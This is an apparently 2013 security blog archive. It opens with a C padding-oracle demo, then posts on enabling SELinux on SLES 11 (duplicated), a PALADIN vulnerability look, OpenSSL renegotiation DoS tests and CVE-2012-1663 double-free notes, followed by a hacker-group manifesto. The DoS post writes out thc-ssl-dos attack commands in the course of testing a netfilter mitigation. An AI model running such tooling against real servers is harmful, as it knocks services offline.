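 * the signal a padding oracle attack, and Lucky Thirteen's timing variant, is
 * built on.  The constant-time unpad reads every byte and yields one bit.
 * The *work counters are added instrumentation so the difference is testable. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK 16

/* Naive unpad: returns the plaintext length, -1 for an out-of-range pad byte,
 * -2 when a padding byte mismatches (and stops right there). */
int unpad_naive(const uint8_t *blk, size_t *work) {
    uint8_t pad = blk[BLOCK - 1];
    *work = 1;                                  /* bytes examined so far */
    if (pad == 0 || pad > BLOCK) return -1;
    for (size_t i = BLOCK - pad; i < BLOCK - 1; i++) {
        (*work)++;
        if (blk[i] != pad) return -2;           /* early exit leaks the position */
    }
    return BLOCK - pad;
}

/* Branch-free comparisons on byte values: 0xFF when true, 0x00 when false. */
static uint8_t ct_eq(uint8_t a, uint8_t b) {
    uint32_t x = (uint32_t)(a ^ b);             /* zero only when equal */
    return (uint8_t)(((x - 1) >> 8) & 0xFF);    /* borrow reaches bit 8 iff x == 0 */
}
static uint8_t ct_lt(uint8_t a, uint8_t b) {
    return (uint8_t)((((uint32_t)a - (uint32_t)b) >> 8) & 0xFF);  /* wraps iff a < b */
}

/* Constant-time unpad: every byte of the block is read and folded into one
 * mask regardless of where (or whether) the padding is wrong.  Returns 1 if
 * the padding is valid, 0 otherwise; *len is the plaintext length when valid. */
int unpad_ct(const uint8_t *blk, size_t *len, size_t *work) {
    uint8_t pad = blk[BLOCK - 1];
    uint8_t good = ct_lt(0, pad) & ct_lt(pad, BLOCK + 1);   /* 1 <= pad <= BLOCK */
    *work = 0;
    for (size_t i = 0; i < BLOCK; i++) {
        /* byte i belongs to the padding iff BLOCK - i <= pad */
        uint8_t in_pad = ct_lt((uint8_t)(BLOCK - 1 - i), pad);
        good &= (uint8_t)~(in_pad & (uint8_t)~ct_eq(blk[i], pad));
        (*work)++;
    }
    *len = BLOCK - (size_t)(pad & good);        /* computed unconditionally; BLOCK when invalid */
    return good & 1;
}

int main(void) {
    /* Constructed sample matching the post's last block: "Hello World" padded
     * with five 0x05 bytes, and a copy with one padding byte corrupted. */
    uint8_t good[BLOCK], bad[BLOCK];
    size_t len, w;
    int r;
    memcpy(good, "Hello World\x05\x05\x05\x05\x05", BLOCK);
    memcpy(bad, good, BLOCK);
    bad[12] = 0x04;
    r = unpad_naive(good, &w);
    printf("naive good: result %d after %zu bytes\n", r, w);
    r = unpad_naive(bad, &w);
    printf("naive bad:  result %d after %zu bytes\n", r, w);
    r = unpad_ct(good, &len, &w);
    printf("ct good:    valid=%d len=%zu after %zu bytes\n", r, len, w);
    r = unpad_ct(bad, &len, &w);
    printf("ct bad:     valid=%d after %zu bytes\n", r, w);
    return 0;
}
```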
Wednesday, April 17, 2013
How to enable SELinux in SLES 11 SP2
I've been playing with SELinux for a few days. Once you decide to hack on SELinux, a very long hacking journey begins. The 1st shit you need to do is to enable SELinux before you dive into the details. Yes, you may already know these great resources, which can help your great SELinux hacking journey:
1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition
SELinux is already compiled into the SUSE Linux Enterprise Server 11 SP2 kernel but without any specific policies. OK then, I've bullshitted a lot, haven't I? Please allow me to bullshit a lot more;-)
Firstly, make sure SLES 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).
--------------------------------------------------------------------------------
Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------
Type "yast2 bootloader" in cmdline and add:
--------------------------------------------------------------------------------
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
In the GRUB bootloader, these three options relate to SELinux:
* security=selinux, tells the kernel to use SELinux and not AppArmor
* selinux=1, switches on SELinux
* enforcing=0, puts SELinux in permissive mode( only logging)
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------
Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------
Add selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------
Set the restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------
Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:
shawn-fortress:~ # sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: permissive
Mode from config file: permissive
Policy version: 26
Policy from config file: refpolicy-standard
See, it's working!
Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me to understand the config of SELinux in big picture.
May L0rd's hacking spirit guide us!
1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition
The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)
Firstly, make sure SELS 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).
--------------------------------------------------------------------------------
Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------
Type "yast2 bootloader" in cmdline and add:
--------------------------------------------------------------------------------
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
In GRUB bootloader, these above 3 options are used related to SELinux.
* security=selinux, tells the kernel to use SELinux and not AppArmor
* selinux=1, switches on SELinux
* enforcing=0, puts SELinux in permissive mode( only logging)
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------
Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------
Add selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------
set restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------
Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:
shawn-fortress:~ # sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: permissive
Mode from config file: permissive
Policy version: 26
Policy from config file: refpolicy-standard
See, it's working!
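To verify the result of the steps above on a booted system, here is an added example (not from the original post) that compares the kernel cmdline options with what sestatus reports; it assumes AppArmor is the default LSM, as on SLES 11, and its sample inputs are constructed.

```python
"""Check that a SUSE box booted into the SELinux setup described above:
the kernel cmdline options versus what sestatus reports.
Added example, not from the original post; the sample inputs at the
bottom are constructed (the sestatus lines mirror the post's output)."""

# cmdline options the post adds via "yast2 bootloader"; enforcing= is checked
# separately because it selects the mode rather than switching SELinux on.
REQUIRED_CMDLINE = {"security": "selinux", "selinux": "1"}


def parse_cmdline(cmdline):
    """Turn /proc/cmdline text into {key: value}; bare flags map to ''."""
    opts = {}
    for token in cmdline.split():
        key, _, value = token.partition("=")
        opts[key] = value
    return opts


def parse_sestatus(text):
    """Parse 'sestatus' output ("Field: value" per line) into a dict."""
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def expected_mode(opts):
    """Mode the cmdline asks for. Assumes AppArmor is the default LSM (as on
    SLES 11), so SELinux is only active when security=selinux is present."""
    if opts.get("security") != "selinux" or opts.get("selinux") == "0":
        return "disabled"
    return {"0": "permissive", "1": "enforcing"}.get(opts.get("enforcing"), "from-config")


def check_selinux(cmdline, sestatus_text):
    """Return a list of mismatches; an empty list means the running state
    matches what the cmdline requested."""
    opts = parse_cmdline(cmdline)
    status = parse_sestatus(sestatus_text)
    problems = []
    for key, value in REQUIRED_CMDLINE.items():
        if opts.get(key) != value:
            problems.append(f"cmdline: expected {key}={value}, got {opts.get(key, '<missing>')}")
    wanted = expected_mode(opts)
    if status.get("SELinux status") != "enabled":
        if wanted != "disabled":
            problems.append("sestatus: SELinux is not enabled although the cmdline selects it")
        return problems
    if wanted == "disabled":
        problems.append("sestatus: SELinux is enabled although the cmdline does not select it")
    elif wanted != "from-config" and status.get("Current mode") != wanted:
        problems.append(f"sestatus: current mode is {status.get('Current mode')}, cmdline asks for {wanted}")
    return problems


# Constructed samples: a cmdline carrying the post's options, and the post's sestatus output.
SAMPLE_CMDLINE = "root=/dev/sda2 resume=/dev/sda1 splash=silent quiet security=selinux selinux=1 enforcing=0"
SAMPLE_SESTATUS = """\
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: permissive
Mode from config file: permissive
Policy version: 26
Policy from config file: refpolicy-standard
"""

if __name__ == "__main__":
    # On a live box, read /proc/cmdline and the output of sestatus instead of the samples.
    for line in check_selinux(SAMPLE_CMDLINE, SAMPLE_SESTATUS) or ["OK: booted as configured"]:
        print(line)
```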
Thanks to Thomas Biege, who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me understand the SELinux configuration in the big picture.
May L0rd's hacking spirit guide us!
Monday, April 01, 2013
Vuln assessment for PALADIN forensic tools free version
I went to the China Mac Forensic Conference last week. This was the 1st time I attended a security con about forensics. Some security guys gave a few free talks, all about forensics. In the forensics field, the only tool I knew was Lynis, which was written by Michael Boelen. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little bored. But what else could I complain about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting in the afternoon. A company named SUMURI provides a forensic solution based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up on the spot. Well, I was fuc* excited because I had got tens of shitloads of information about Mac/iOS that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks in the PALADIN GNU/Linux distro. I've already notified them. Hope they can spend more time on security stuff.
OK. When PALADIN boots up, you see the Ubuntu-like (Unity?) GUI:
PALADIN provides a lot of open source forensic tools:
In the free version, the only closed-source tool is "PALADIN Toolbox", which can be found on the Desktop; the binary file is located at /usr/bin/toolbox. This binary uses many free/open source libraries. The 1st potential issue is violation of free/open source licenses. So I asked Steve Whalen on the spot: "are you sure that toolbox has no violation of the free/open source licenses?" His answer was pretty sure that the toolbox won't violate any free/open source licenses:
Then, I took a few mins to investigate the binary. Firstly, the entry address:
And, it doesn't have any anti-debugging features (my examples) in it. If your asset is a closed-source binary, you should do anti-debugging. A skilled reverse engineer is able to find the security issues by reversing the binary in a very *short* time:
ASLR is turned on. "2" is very good, which means the kernel does the randomization for stack and heap separately. AFAIK, the issue is that ASLR only works with PIE.
The Lucky Thirteen attack is a big issue recently. The current OpenSSL version is affected.
Well, this is it. I had done the investigation when a guy told me it was time for the smb break. I'm very happy to see a company like SUMURI bringing GNU/Linux into the forensic field.
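On the ASLR/PIE point: whether the main executable itself gets relocated depends on both the randomize_va_space knob and the binary being PIE (ELF type ET_DYN). The following is an added example, not from the original post, that reads the ELF header to decide this; the headers it is tested on are constructed, and treating every ET_DYN file as PIE is a simplification (shared libraries are ET_DYN too).

```python
"""Does a Linux executable's own code get randomized? The kernel knob
randomize_va_space scatters stack/mmap/heap, but the main image only moves
when the binary is position independent (ELF e_type == ET_DYN).
Added example, not from the original post; test headers are constructed."""
import struct
import sys

ET_EXEC, ET_DYN = 2, 3
# Meaning of /proc/sys/kernel/randomize_va_space values (kernel sysctl documentation)
RANDOMIZE_VA_SPACE = {
    0: "no randomization",
    1: "stack, mmap base and VDSO randomized",
    2: "stack, mmap base, VDSO and brk-based heap randomized",
}


def elf_type(header: bytes) -> int:
    """Return e_type from a raw ELF header (the first 18 bytes are enough),
    decoding it with the byte order announced in EI_DATA."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    endian = "<" if header[5] == 1 else ">"  # EI_DATA: 1 = little-endian, 2 = big-endian
    return struct.unpack(endian + "H", header[16:18])[0]


def main_image_randomized(randomize_va_space: int, header: bytes) -> bool:
    """True only if ASLR is on at all and the executable is PIE.
    Simplification: any ET_DYN object is taken as PIE; a fuller check would
    also look for PT_INTERP to tell executables from shared libraries."""
    return randomize_va_space > 0 and elf_type(header) == ET_DYN


def make_header(e_type: int, little_endian: bool = True, elf64: bool = True) -> bytes:
    """Construct a minimal ELF header (e_ident + e_type + e_machine) for testing."""
    ident = b"\x7fELF" + bytes([2 if elf64 else 1, 1 if little_endian else 2, 1]) + bytes(9)
    return ident + struct.pack(("<" if little_endian else ">") + "HH", e_type, 62)  # 62 = x86-64


if __name__ == "__main__":
    # Usage: python aslr_check.py /path/to/binary (e.g. the toolbox binary from the post)
    with open(sys.argv[1], "rb") as f:
        hdr = f.read(64)
    with open("/proc/sys/kernel/randomize_va_space") as f:
        knob = int(f.read())
    print("randomize_va_space =", knob, "->", RANDOMIZE_VA_SPACE.get(knob, "unknown"))
    print("main image randomized:", main_image_randomized(knob, hdr))
```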
Thursday, March 28, 2013
Openssl renegotiation DoS attack is still an issue
OpenSSL renegotiation could cause a DoS attack, which was disclosed in 2011; then THC released their DoS attack tool. This issue is what we call CVE-2011-1473, and until now the OpenSSL upstream community hasn't given any solution. So it seems they've left this issue to the application developers (suck this shit in mind), e.g. Apache2 provides an optional config that lets you disable renegotiation.
Let's see what an Apache2 server would do in most cases:
shawn@fortress / $ openssl s_client -connect build.opensuse.org:443
..............................
..............................
Timeout : 300 (sec)
Verify return code: 20 (unable to get local issuer certificate) ---
R // Press R, then enter
RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:
According to Vincent Bernat, a server requires 15 times the processing power of the client, which means a laptop with an Intel i7 CPU can kick a bunch of servers' asses. Plz take a look at my test data:
Test environment: SLES 11 SP2, assigned 2 cores + 1GB memory in a virtual machine
Case I:
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Case II: Vincent Bernat provided an open source hardening/mitigation solution, which adds some rate-limit/fixed hex data filtering on netfilter.
#sh iptables.sh
#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Well done, Vincent! Your solution works. But I'm not sure whether it may cause side effects. Vincent added some fixed hex data as the filtering policy on netfilter. What if the same hex data occurs elsewhere? Is a false positive possible?
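On the false-positive question: a fixed hex pattern does not know where TLS records start, whereas the record header (content type) stays in clear text even after the session is encrypted, so a record-aware check can count renegotiations without ever matching ciphertext. The following is an added example, not from the original post and not Vincent Bernat's netfilter rules; its byte streams are constructed and the state machine assumes TLS 1.0-1.2 record framing.

```python
"""Spot client-initiated TLS renegotiation in a client->server byte stream
two ways: a naive fixed-byte match, like a netfilter string rule looking for
16 03 01, and a record-aware parser that only counts handshake records
arriving on an already-encrypted session.
Added example, not from the post and not Vincent Bernat's rules; all streams
below are constructed samples."""

HANDSHAKE, CHANGE_CIPHER_SPEC, APPLICATION_DATA = 0x16, 0x14, 0x17


def naive_hex_match(stream: bytes) -> int:
    """Count 16 03 01 anywhere in the stream, ignoring TLS record boundaries
    (what a fixed hex pattern applied to packet payloads effectively sees)."""
    return stream.count(b"\x16\x03\x01")


def tls_records(stream: bytes):
    """Yield (content_type, version, payload) for each complete TLS record.
    Record headers are never encrypted in TLS 1.0-1.2, so the content type is
    always readable even when the payload is ciphertext."""
    off = 0
    while off + 5 <= len(stream):
        ctype = stream[off]
        version = (stream[off + 1] << 8) | stream[off + 2]
        length = (stream[off + 3] << 8) | stream[off + 4]
        if off + 5 + length > len(stream):
            break  # truncated record: stop instead of guessing
        yield ctype, version, stream[off + 5:off + 5 + length]
        off += 5 + length


def count_renegotiations(client_stream: bytes) -> int:
    """Count renegotiations the client starts. After the client's
    ChangeCipherSpec exactly one handshake record (Finished) is expected; any
    further handshake record before the next ChangeCipherSpec opens a new,
    encrypted handshake, i.e. a renegotiation."""
    state, renegs = "initial", 0
    for ctype, _version, _payload in tls_records(client_stream):
        if ctype == CHANGE_CIPHER_SPEC:
            state = "await_finished"
        elif ctype == HANDSHAKE:
            if state == "await_finished":
                state = "established"
            elif state == "established":
                renegs += 1
                state = "renegotiating"  # later records of the same handshake are not re-counted
    return renegs


def should_throttle(client_stream: bytes, limit: int) -> bool:
    """Policy hook: more than `limit` renegotiations on one connection is abuse."""
    return count_renegotiations(client_stream) > limit


def record(ctype: int, payload: bytes, version: int = 0x0301) -> bytes:
    """Build one TLS record: 5-byte header (type, version, length) + payload."""
    return bytes([ctype, version >> 8, version & 0xFF, len(payload) >> 8, len(payload) & 0xFF]) + payload


# Constructed client->server streams (payloads are stand-ins, not real handshake bodies).
CLIENT_HELLO = record(HANDSHAKE, b"\x01" + bytes(40))        # handshake type 1 = ClientHello
CLIENT_KEY_EXCHANGE = record(HANDSHAKE, b"\x10" + bytes(20))
CCS = record(CHANGE_CIPHER_SPEC, b"\x01")
FINISHED = record(HANDSHAKE, bytes(range(32)))               # encrypted Finished, opaque on the wire
# application data whose ciphertext happens to contain 16 03 01 three times
APP_DATA = record(APPLICATION_DATA, b"\xaa\xbb\x16\x03\x01\xcc\xdd" * 3)

BENIGN_STREAM = CLIENT_HELLO + CLIENT_KEY_EXCHANGE + CCS + FINISHED + APP_DATA
# one renegotiation round: encrypted ClientHello, ClientKeyExchange, new CCS, Finished, some data
RENEG_ROUND = record(HANDSHAKE, bytes(48)) + record(HANDSHAKE, bytes(24)) + CCS + FINISHED + APP_DATA
FLOOD_STREAM = BENIGN_STREAM + RENEG_ROUND * 5

if __name__ == "__main__":
    for name, stream in (("benign", BENIGN_STREAM), ("flood", FLOOD_STREAM)):
        print(name, "naive hits:", naive_hex_match(stream),
              "renegotiations:", count_renegotiations(stream),
              "throttle:", should_throttle(stream, limit=3))
```

On the benign stream the naive pattern fires six times (three genuine handshake headers plus three hits inside ciphertext) while the record-aware count is zero, which is the false positive the post asks about.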
Wednesday, March 20, 2013
possible ways to exploit CVE-2012-1663
CVE-2012-1663 is a possible remote DoS issue. It has been fixed in GnuTLS >= 3.0.14. I hacked on it for hours and figured out a few prerequisites that make it vulnerable:
=============================
REQUIRED:
- prior to GNUTLS 3.0.14
- crafted certificate
=============================
Attack scenarios
- a client imports a crafted cert file for sending requests to a server (CA?)
- a "server" imports a crafted cert file for sending requests to another server (CA?)
---> the above manipulations are used at high frequency
From the client side, the attacker would try to construct a crafted certificate that makes the function below fail:
    ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
    if (ret < 0)
      {
        gnutls_pubkey_deinit(pcert->pubkey);
        /* pcert->pubkey should be NULL now */
        ret = gnutls_assert_val(ret);
        goto cleanup;
      }
I made up two crafted cert files (client.pem, client2.pem) that seem to trigger the double free issue on the client's side.
Warning: Don't try it on your host machine because it would cost too much memory and make your machine very slow. I highly recommend you use a VM for testing.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................
Another terminal: killall client
Test platform: Slackware 13.37 + GNUTLS-3.0.13
Sunday, October 21, 2012
My story - The falling of Hackerfellowship Group
Where should I begin? The story I'm going to share is definitely a long story. I will make it as short as I can.
I became a Christian in 2004. Then in the following years I was reading/learning a lot about other people's consequences of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking "aha" ideas. There were more face-to-face conversations back then. I sponsored a community to get a group of people together to discuss some topics. HFG (Hackerfellowship Group) was born in 2007. We had monthly meetings for 5 years. We also had a lot of discussions on the mailing list. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in an organic community: people must already have an organic life, a hacker's life. I expected HFG could have the spirit of an underground community but it never did. Because the guys I was hacking with were not hackers and didn't even understand what the hacker ethic is. Nalaginrut/fU9ANg/口水猫/....you are not fucking hackers! How could people get used to talking about the hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more of a security guy rather than a generic hacker. I shut down the mailing list and made it open to the public. Someday in the future, will I be back? I don't know. Anything is possible if I really want it.
Don't get me wrong. Some former HFG members are still my good friends. Unfortunately, only friends, without the brotherhood tag. I built my own fundamental structure of philosophy from the experiences in HFG. Unfortunately again, it was only my philosophy; it always will be. I finally decided to release the latest version of the HFG manifesto on my blog last month. I hope it can help people who are struggling with these sorts of philosophical ideas. But I'm not sure whether it could really be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...
btw: the Internet is an incredible system. No one gives a shit about who you are or what you believe on the Internet. All the Internet cares about is ideas. V is right that ideas are immortal. No one can destroy ideas.
-----------------------------------------------------------------------------------------------------
HFG( Hackerfellowship Group) manifesto alpha-end revised version
What is Fellowship?
In ancient Greece, a fellowship meant a group of guys hacking together to achieve the same goal. The HackerFellowship gets hackers together for conversation/sharing/hacking. Hackers always live in the future, and define the future!
What is our goal?
Hacking, find the truth! Because hackers want/need truth. Hackers must experience some sort of underground scene. We are trying to build an underground online/offline community to help us dig deeper, behind the surface. Hacking on the 4-layer model of Theo/Philo/Math/Engi with the inevitable complexity of this world...
I want to join in, but how?
Wait a minute, my dear friend. We wish you could be one of us, just like a brother (maybe you are a sister) returning home. We all know that choosing a strong philosophy is our only option. In the whole eco-system (Sunday school->brotherhood->community->start-up->company->multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we are really concerned about is your own philosophy, and we need you to prove that you have the abilities or background below to contribute:
1, Join in conversations like a philosopher who lived in ancient Greece.
2, If you come from the computer field, you should have basic computer programming skills either in C (think about the way of the Turing Machine) or Scheme (think about the way of the Lambda calculus), and the ability to form your own personal world view of the computing field.
3, If you are an atheist, we only accept real atheists (like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not that type, fuck outta here.
4, If you are a Christian, only the reformed faith (Lutheranism, Calvinism, neo-Calvinism, etc) is welcome in HFG! Because we need Christians who are willing to dedicate themselves to the cultural mandate (as defined by reformed theology) in their hacking field.
Why HFG?
There may be dozens of reasons. We only list some highlights:
1, We are the type of people who follow the hacker ethic and focus on the purpose of life. Even if we don't know the purpose or our position in this specific era, we are still trying to figure it out.
2, The brotherhood is like the 2nd Foundation that never existed. Wait... Where the hell is the 1st Foundation? Do you get it? Joining HFG means you have a chance to learn/hack on how to build an underground brotherhood.
3, Not all of us come from computer fields. A lot of people did really good jobs in non-computer fields; we call them Generic hackers. The hacker ethic now affects more places than we thought. We are hackers! We are anonymous! We have different hacking backgrounds. But we share the same methodologies.
We suggest you learn these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming( python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Technique topics:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Some materials from our friendly arsenal:
------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Himanen
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosophy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Calvin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion - John Ronald Reuel Tolkien
The trilogy of The Lord of the Rings - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism - Max Weber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St. Augustine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St. Augustine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
Hidden Order: How Adaptation Builds Complexity - John Holland
The Quark and the Jaguar: Adventures in the Simple and the Complex - Murray Gell-Mann
------------------------------------------------------------------------------------------
Chinese version
What is Fellowship?
In ancient Greece, Fellowship meant a group of people with the same purpose gathering together to work hard at accomplishing something. HFG is such a place. Hackers always live in the future, and are also the creators of the future!
Our goal?
Hacking, find the truth in every field! Because the hacker's heart longs for truth. The underground scene is an experience a hacker must have. We are trying to build an underground online and offline community to help ourselves dig better for the truth beneath the surface. The process of hacking the whole four-layer model (theology/philosophy/mathematics/engineering) inevitably runs into the complexity of the world.
Requirements for joining HFG:
Please think seriously about your motivation for joining HFG. HFG is like a brotherhood (note: a brotherhood is not a soy-paste vat); you must share your thoughts, because that is how more "aha"s are struck. Besides a sharing attitude, you also have to meet the following conditions:
1, Discuss with an open attitude; we care about your philosophy, not hearsay knowledge.
2, If you come from the computer field, you should technically have at least programming experience: C basics (the Turing machine route) or Scheme programming basics (the lambda calculus route), and the ability to build a world view of computer science.
3, If you are an atheist, we only accept real atheists, because they will pay any price to seek the truth; if you are an atheist in the popular sense, get lost right away!
4, If you are a Christian, only the reformed faith (Lutheran, Calvinist, etc) is accepted by HFG, because they are willing to devote themselves to the cultural mandate in every field.
Why join HFG?
There may be many reasons, but here we only list the most important ones:
1, We are a group of people who strive to seek the meaning of life and follow the hacker ethic. Even if we haven't yet figured out the meaning of our existence or our position against the background of this era, that's fine, we will figure it out.
2, The brotherhood, like the Second Foundation, has never existed. Wait... then where is the First Foundation? Do you understand this metaphor? Joining HFG at least means you can learn and take part in building an underground brotherhood.
3, Not everyone comes from the computer field. Many people have done great work in non-computer fields; we simply call them Generic Hackers. The influence of the hacker ethic far exceeds our imagination. We are hackers! We are anonymous! We have different hacking experiences and backgrounds. But we share the same methodology.
MIT OCW courses HFG recommends studying:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming (python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Technical topics in the computer field:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Reading list:
------------------------------------------------------------------------------------------
The Holy Bible(圣经) - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age(黑客伦理与信息时代精神) by Pekka Himanen
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age(黑客与画家:科技时代的思想碰撞) by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosophy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion(基督教要义) - John Calvin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion(精灵宝钻) - John Ronald Reuel Tolkien
The Trilogy of The Lord of the Rings(魔戒三部曲) - John Ronald Reuel Tolkien
The Protestant Ethic and the Spirit of Capitalism(新教伦理与资本主义精神) - Max Weber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World(思想的结果) - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions(忏悔录) - St. Augustine
The Great Philosophers(大哲学家) - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power(权力意志) - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
